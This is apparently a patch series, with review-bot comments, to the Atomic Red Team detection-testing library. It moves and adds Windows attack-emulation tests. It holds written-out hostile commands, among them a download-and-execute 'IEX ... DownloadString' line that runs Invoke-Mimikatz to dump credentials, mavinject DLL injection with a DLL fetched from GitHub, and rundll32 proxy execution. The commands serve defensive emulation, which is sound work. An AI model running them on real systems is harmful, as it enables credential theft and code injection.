+ identifier: T1055.001
+ atomic_tests:
+ - name: Process Injection via mavinject.exe
+ auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254
+ description: |
+ Windows 10 Utility To Inject DLLS.
+
+ Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
+ With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
+ supported_platforms:
+ - windows
+ input_arguments:
+ process_id:
+ description: PID of input_arguments
+ type: Integer
+ default: "(Start-Process notepad -PassThru).id"
+ dll_payload:
+ description: DLL to Inject
+ type: Path
+ default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Utility to inject must exist on disk at specified location (#{dll_payload})
+
+'
+ prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
+ executor:
+ command: |
+ $mypid = #{process_id}
+ mavinject $mypid /INJECTRUNNING #{dll_payload}
+ name: powershell
+ elevation_required: true
T1548.004:
technique:
external_references:
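Review bot: The moved test's description still says "powershell.exe will download T1055.dll to disk" and "process injection in T1055.dll", while `dll_payload` now defaults to `PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll` and the get_prereq_command fetches `T1055.001.dll`, so the prose should follow the rename, e.g. `powershell.exe will download T1055.001.dll to disk`. The `process_id` description `PID of input_arguments` does not describe the argument; `PID of the process to inject into` matches what the executor does with it. The get_prereq_command pulls the DLL from the repository's `master` branch with no integrity check, so the payload that gets injected is whatever master holds at run time; pinning the URL to a commit (as the Mimikatz test later in this series does) or checking a file hash in the prereq would make the test reproducible. The same text recurs in the defense-evasion hunk at `@@ -30160` and in the new atomics/T1055.001/T1055.001.md; index.yaml appears to be regenerated by the doc-generator job (see the 7/7 commit), so the fix belongs in the technique's source YAML rather than here.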
@@ -5901,41 +5937,6 @@ privilege-escalation:
x_mitre_is_subtechnique: false
identifier: T1055
atomic_tests:
- - name: Process Injection via mavinject.exe
- auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254
- description: |
- Windows 10 Utility To Inject DLLS.
-
- Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
- With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
- supported_platforms:
- - windows
- input_arguments:
- process_id:
- description: PID of input_arguments
- type: Integer
- default: "(Start-Process notepad -PassThru).id"
- dll_payload:
- description: DLL to Inject
- type: Path
- default: PathToAtomicsFolder\T1055\src\x64\T1055.dll
- dependency_executor_name: powershell
- dependencies:
- - description: 'Utility to inject must exist on disk at specified location (#{dll_payload})
-
-'
- prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-
-'
- get_prereq_command: |
- New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}"
- executor:
- command: |
- $mypid = #{process_id}
- mavinject $mypid /INJECTRUNNING #{dll_payload}
- name: powershell
- elevation_required: true
- name: Shellcode execution via VBA
auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048
description: |
@@ -30160,7 +30161,43 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- atomic_tests: []
+ identifier: T1055.001
+ atomic_tests:
+ - name: Process Injection via mavinject.exe
+ auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254
+ description: |
+ Windows 10 Utility To Inject DLLS.
+
+ Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
+ With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
+ supported_platforms:
+ - windows
+ input_arguments:
+ process_id:
+ description: PID of input_arguments
+ type: Integer
+ default: "(Start-Process notepad -PassThru).id"
+ dll_payload:
+ description: DLL to Inject
+ type: Path
+ default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Utility to inject must exist on disk at specified location (#{dll_payload})
+
+'
+ prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
+ executor:
+ command: |
+ $mypid = #{process_id}
+ mavinject $mypid /INJECTRUNNING #{dll_payload}
+ name: powershell
+ elevation_required: true
T1548.004:
technique:
external_references:
@@ -37252,41 +37289,6 @@ defense-evasion:
x_mitre_is_subtechnique: false
identifier: T1055
atomic_tests:
- - name: Process Injection via mavinject.exe
- auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254
- description: |
- Windows 10 Utility To Inject DLLS.
-
- Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
- With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
- supported_platforms:
- - windows
- input_arguments:
- process_id:
- description: PID of input_arguments
- type: Integer
- default: "(Start-Process notepad -PassThru).id"
- dll_payload:
- description: DLL to Inject
- type: Path
- default: PathToAtomicsFolder\T1055\src\x64\T1055.dll
- dependency_executor_name: powershell
- dependencies:
- - description: 'Utility to inject must exist on disk at specified location (#{dll_payload})
-
-'
- prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-
-'
- get_prereq_command: |
- New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}"
- executor:
- command: |
- $mypid = #{process_id}
- mavinject $mypid /INJECTRUNNING #{dll_payload}
- name: powershell
- elevation_required: true
- name: Shellcode execution via VBA
auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048
description: |
@@ -39100,6 +39102,24 @@ defense-evasion:
rundll32.exe url.dll,OpenURL PathToAtomicsFolder\T1218.011\src\index.hta
rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteullen.vbs
name: command_prompt
+ - name: Launches an executable using Rundll32 and pcwutl.dll
+ auto_generated_guid: 9f5d081a-ee5a-42f9-a04e-b7bdc487e676
+ description: 'Executes the LaunchApplication function in pcwutl.dll to proxy
+ execution of an executable.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ exe_to_launch:
+ description: Path of the executable to launch
+ type: path
+ default: "%windir%\\System32\\notepad.exe"
+ executor:
+ command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
+
+'
+ name: command_prompt
T1134.005:
technique:
external_references:
@@ -55503,6 +55523,31 @@ execution:
'
name: powershell
+ - name: Writes text to a file and displays it.
+ auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e
+ description: 'Writes text to a file and display the results. This test is intended
+ to emulate the dropping of a malicious file to disk.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_contents_path:
+ description: Path to the file that the command prompt will drop.
+ type: path
+ default: "%TEMP%\\test.bin"
+ message:
+ description: Message that will be written to disk and then displayed.
+ type: string
+ default: Hello from the Windows Command Prompt!
+ executor:
+ command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
+
+'
+ cleanup_command: 'del "#{file_contents_path}"
+
+'
+ name: command_prompt
T1047:
technique:
id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055
diff --git a/atomics/T1055.001/T1055.001.md b/atomics/T1055.001/T1055.001.md
new file mode 100644
index 0000000000..09391906da
--- /dev/null
+++ b/atomics/T1055.001/T1055.001.md
@@ -0,0 +1,62 @@
+# T1055.001 - Dynamic-link Library Injection
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1055/001)
+Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.
+
+DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx
and WriteProcessMemory
, then invoked with CreateRemoteThread
(which calls the LoadLibrary
API responsible for loading the DLL). (Citation: Endgame Process Injection July 2017)
+
+Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary
).(Citation: Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July 2017)
+
+Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.
+
+## Atomic Tests
+
+- [Atomic Test #1 - Process Injection via mavinject.exe](#atomic-test-1---process-injection-via-mavinjectexe)
+
+
+
+
+## Atomic Test #1 - Process Injection via mavinject.exe
+Windows 10 Utility To Inject DLLS.
+
+Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
+With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id|
+| dll_payload | DLL to Inject | Path | PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+$mypid = #{process_id}
+mavinject $mypid /INJECTRUNNING #{dll_payload}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Utility to inject must exist on disk at specified location (#{dll_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
+```
+
+
+
+
+
diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md
index 33744ad2a9..d314dc1e54 100644
--- a/atomics/T1055/T1055.md
+++ b/atomics/T1055/T1055.md
@@ -8,63 +8,14 @@ More sophisticated samples may perform multiple process injections to segment mo
## Atomic Tests
-- [Atomic Test #1 - Process Injection via mavinject.exe](#atomic-test-1---process-injection-via-mavinjectexe)
+- [Atomic Test #1 - Shellcode execution via VBA](#atomic-test-1---shellcode-execution-via-vba)
-- [Atomic Test #2 - Shellcode execution via VBA](#atomic-test-2---shellcode-execution-via-vba)
+- [Atomic Test #2 - Remote Process Injection in LSASS via mimikatz](#atomic-test-2---remote-process-injection-in-lsass-via-mimikatz)
-- [Atomic Test #3 - Remote Process Injection in LSASS via mimikatz](#atomic-test-3---remote-process-injection-in-lsass-via-mimikatz)
-
-
-
-## Atomic Test #1 - Process Injection via mavinject.exe
-Windows 10 Utility To Inject DLLS.
-
-Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
-With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id|
-| dll_payload | DLL to Inject | Path | PathToAtomicsFolder\T1055\src\x64\T1055.dll|
-
-
-#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
-
-
-```powershell
-$mypid = #{process_id}
-mavinject $mypid /INJECTRUNNING #{dll_payload}
-```
-
-
-
-
-#### Dependencies: Run with `powershell`!
-##### Description: Utility to inject must exist on disk at specified location (#{dll_payload})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}"
-```
-
-
-
-
-
-## Atomic Test #2 - Shellcode execution via VBA
+## Atomic Test #1 - Shellcode execution via VBA
This module injects shellcode into a newly created process and executes. By default the shellcode is created,
with Metasploit, for use on x86-64 Windows 10 machines.
@@ -110,7 +61,7 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
-## Atomic Test #3 - Remote Process Injection in LSASS via mimikatz
+## Atomic Test #2 - Remote Process Injection in LSASS via mimikatz
Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
It must be executed in the context of a user who is privileged on remote `machine`.
diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md
index 334ad38ef8..118bee9ba1 100644
--- a/atomics/T1059.003/T1059.003.md
+++ b/atomics/T1059.003/T1059.003.md
@@ -10,6 +10,8 @@ Adversaries may leverage cmd.exe
to execute various commands and pa
- [Atomic Test #1 - Create and Execute Batch Script](#atomic-test-1---create-and-execute-batch-script)
+- [Atomic Test #2 - Writes text to a file and displays it.](#atomic-test-2---writes-text-to-a-file-and-displays-it)
+
@@ -57,4 +59,38 @@ Set-Content -Path #{script_path} -Value "#{command_to_execute}"
+
+
+
+## Atomic Test #2 - Writes text to a file and displays it.
+Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_contents_path | Path to the file that the command prompt will drop. | path | %TEMP%\test.bin|
+| message | Message that will be written to disk and then displayed. | string | Hello from the Windows Command Prompt!|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
+```
+
+#### Cleanup Commands:
+```cmd
+del "#{file_contents_path}"
+```
+
+
+
+
+
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md
index 46eace6c26..a49be86f2f 100644
--- a/atomics/T1218.011/T1218.011.md
+++ b/atomics/T1218.011/T1218.011.md
@@ -22,6 +22,8 @@ Rundll32 can also be used to execute scripts such as JavaScript. This can be don
- [Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll](#atomic-test-7---execution-of-hta-and-vbs-files-using-rundll32-and-urldll)
+- [Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll](#atomic-test-8---launches-an-executable-using-rundll32-and-pcwutldll)
+
@@ -289,4 +291,33 @@ rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteu
+
+
+
+## Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll
+Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| exe_to_launch | Path of the executable to launch | path | %windir%\System32\notepad.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
+```
+
+
+
+
+
+
From 92026b8e3c3bfe4b28c1618471bc60d5adb92024 Mon Sep 17 00:00:00 2001
From: Matt Graeber <60448025+mgraeber-rc@users.noreply.github.com>
Date: Mon, 22 Mar 2021 11:38:35 -0400
Subject: [PATCH 6/7] Moving Invoke-Mimikatz test to T1003.001 (#1407)
---
atomics/T1003.001/T1003.001.yaml | 19 +++++++++++++++++++
atomics/T1003/T1003.yaml | 19 -------------------
2 files changed, 19 insertions(+), 19 deletions(-)
diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 80856999b1..700642e5f1 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -296,4 +296,23 @@ atomic_tests:
cleanup_command: |
del "#{output_file}" >nul 2> nul
name: command_prompt
+ elevation_required: true
+- name: Powershell Mimikatz
+ auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
+ description: |
+ Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
+ If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
+ Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
+ Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
+ supported_platforms:
+ - windows
+ input_arguments:
+ remote_script:
+ description: URL to a remote Mimikatz script that dumps credentials
+ type: Url
+ default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
+ executor:
+ command: |
+ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
+ name: powershell
elevation_required: true
\ No newline at end of file
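Review bot: In the moved test's description, `\"access denied\"` sits inside a `|` literal block scalar, where backslashes are not escapes, so the generated docs will show the backslashes verbatim; the following sentence already uses bare quotes, so write `"access denied"`. The same description misspells `privleges` (`privileges`). The text is carried over from T1003.yaml unchanged, and the move is the natural point to correct it so the regenerated T1003.001.md picks it up; the `remote_script` default being pinned to a specific PowerSploit commit is the right choice and should be kept as is.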
diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index 2374e2ae14..911859c621 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -1,25 +1,6 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
-- name: Powershell Mimikatz
- auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
- description: |
- Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
- If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
- Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
- Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
- supported_platforms:
- - windows
- input_arguments:
- remote_script:
- description: URL to a remote Mimikatz script that dumps credentials
- type: Url
- default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
- executor:
- command: |
- IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
- name: powershell
- elevation_required: true
- name: Gsecdump
auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9
From 058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Mon, 22 Mar 2021 15:39:07 +0000
Subject: [PATCH 7/7] Generate docs from job=generate_and_commit_guids_and_docs
branch=master [skip ci]
---
atomics/Indexes/Indexes-CSV/index.csv | 6 +--
atomics/Indexes/Indexes-CSV/windows-index.csv | 6 +--
atomics/Indexes/Indexes-Markdown/index.md | 6 +--
.../Indexes/Indexes-Markdown/windows-index.md | 6 +--
atomics/Indexes/index.yaml | 44 +++++++++----------
atomics/T1003.001/T1003.001.md | 34 ++++++++++++++
atomics/T1003/T1003.md | 42 ++----------------
7 files changed, 72 insertions(+), 72 deletions(-)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 245c516dcb..57a9195c8a 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -219,6 +219,7 @@ credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikat
credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
+credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -229,9 +230,8 @@ credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-49
credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
-credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
-credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
-credential-access,T1003,OS Credential Dumping,3,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
+credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
+credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 2ca098310b..d52c47ba4a 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -24,6 +24,7 @@ credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikat
credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
+credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -32,9 +33,8 @@ credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542
credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
-credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
-credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
-credential-access,T1003,OS Credential Dumping,3,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
+credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
+credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3201ae2f0a..61a28b8f77 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -441,6 +441,7 @@
- Atomic Test #7: LSASS read with pypykatz [windows]
- Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
+ - Atomic Test #10: Powershell Mimikatz [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
@@ -457,9 +458,8 @@
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- - Atomic Test #1: Powershell Mimikatz [windows]
- - Atomic Test #2: Gsecdump [windows]
- - Atomic Test #3: Credential Dumping with NPPSpy [windows]
+ - Atomic Test #1: Gsecdump [windows]
+ - Atomic Test #2: Credential Dumping with NPPSpy [windows]
- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index de3db12a7c..24de76dc7c 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -48,6 +48,7 @@
- Atomic Test #7: LSASS read with pypykatz [windows]
- Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
+ - Atomic Test #10: Powershell Mimikatz [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
@@ -61,9 +62,8 @@
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- - Atomic Test #1: Powershell Mimikatz [windows]
- - Atomic Test #2: Gsecdump [windows]
- - Atomic Test #3: Credential Dumping with NPPSpy [windows]
+ - Atomic Test #1: Gsecdump [windows]
+ - Atomic Test #2: Credential Dumping with NPPSpy [windows]
- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 353a707908..fc78aab1d4 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -20666,6 +20666,28 @@ credential-access:
'
name: command_prompt
elevation_required: true
+ - name: Powershell Mimikatz
+ auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
+ description: "Dumps credentials from memory via Powershell by invoking a remote
+ mimikatz script.\nIf Mimikatz runs successfully you will see several usernames
+ and hashes output to the screen.\nCommon failures include seeing an \\\"access
+ denied\\\" error which results when Anti-Virus blocks execution. \nOr, if
+ you try to run the test without the required administrative privleges you
+ will see this error near the bottom of the output to the screen \"ERROR kuhl_m_sekurlsa_acquireLSA\"\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ remote_script:
+ description: URL to a remote Mimikatz script that dumps credentials
+ type: Url
+ default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
+ executor:
